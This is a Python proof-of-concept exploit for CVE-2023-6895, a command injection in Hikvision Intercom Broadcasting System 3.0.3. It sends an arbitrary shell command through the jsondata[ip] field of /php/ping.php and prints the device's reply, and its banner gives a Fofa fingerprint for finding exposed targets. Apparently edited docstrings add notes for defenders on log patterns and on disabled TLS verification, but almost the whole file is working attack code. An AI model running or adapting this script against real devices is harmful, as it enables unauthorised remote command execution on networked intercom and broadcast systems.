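import argparse
import sys

import requests


def get_args():
    """Parse the command-line options of this proof-of-concept.

    Returns:
        argparse.Namespace with ``url`` (base URL of the device under test)
        and ``cmd`` (the string placed in the ``jsondata[ip]`` form field,
        default ``id``).
    """
    parser = argparse.ArgumentParser(
        prog="CVE-2023-6895.py",
        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
    )
    # --url is mandatory: Exploit() concatenates it with a path, so a missing
    # value used to surface as an unexplained TypeError traceback.
    parser.add_argument("-u", "--url", required=True,
                        help="URL of target site (ex: http://target.com)")
    parser.add_argument("-c", "--cmd", default="id",
                        help="Command to execute (default = id)")
    return parser.parse_args()


def Exploit(url, cmd):
    """Send the one POST request that reproduces CVE-2023-6895 and print the reply.

    The form body is ``jsondata[type]=3&jsondata[ip]=<cmd>`` (brackets
    percent-encoded, ``cmd`` appended as given) and it is posted to
    ``<url>/php/ping.php``.

    For defenders: this request shape is what shows up in web-server or proxy
    logs. The parameter name suggests the endpoint expects a host to ping, so
    a ``jsondata[ip]`` value that is not a plain address or hostname is the
    thing to alert on; the endpoint should not be reachable from untrusted
    networks.

    Args:
        url: Base URL of the device, without the ``/php/ping.php`` suffix.
        cmd: Value sent in the ``jsondata[ip]`` field.
    """
    body = "jsondata%5Btype%5D=3&jsondata%5Bip%5D=" + cmd
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Pragma': 'no-cache',
        'Upgrade-Insecure-Requests': '1',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Sec-Fetch-Dest': 'document',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-Site': 'none',
        'Sec-Fetch-User': '?1',
        'Te': 'trailers',
        'Connection': 'close'
    }
    expurl = url + '/php/ping.php'

    # verify=False below turns off TLS certificate validation, so the peer is
    # not authenticated and the printed response could come from anything
    # sitting on the path. The warning urllib3 would emit for that is silenced.
    requests.packages.urllib3.disable_warnings()
    try:
        req = requests.post(expurl, data=body, headers=headers, timeout=10, verify=False)
        data = str(req.text.encode('utf-8').decode('unicode_escape'))
    except (requests.RequestException, UnicodeDecodeError) as err:
        # The original used a bare ``except: pass``, which hid timeouts,
        # refused connections and decode errors, and also swallowed Ctrl-C.
        # Report the failure instead so an empty result is not mistaken for
        # "not vulnerable".
        print("request to " + expurl + " failed: " + str(err), file=sys.stderr)
        return
    print("目标:" + url + "结果:" + data)


def main():
    """Print the banner, parse the options and run the single check."""
    print()
    print('===================================================================================')
    print('| Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) |')
    print('| CVE-2023-6895 |')
    print('| by FuBoLuSEC |')
    print('| Fofa:icon_hash="-1830859634" |')
    print('===================================================================================\n')
    args = get_args()
    Exploit(args.url, args.cmd.strip())


if __name__ == '__main__':
    main()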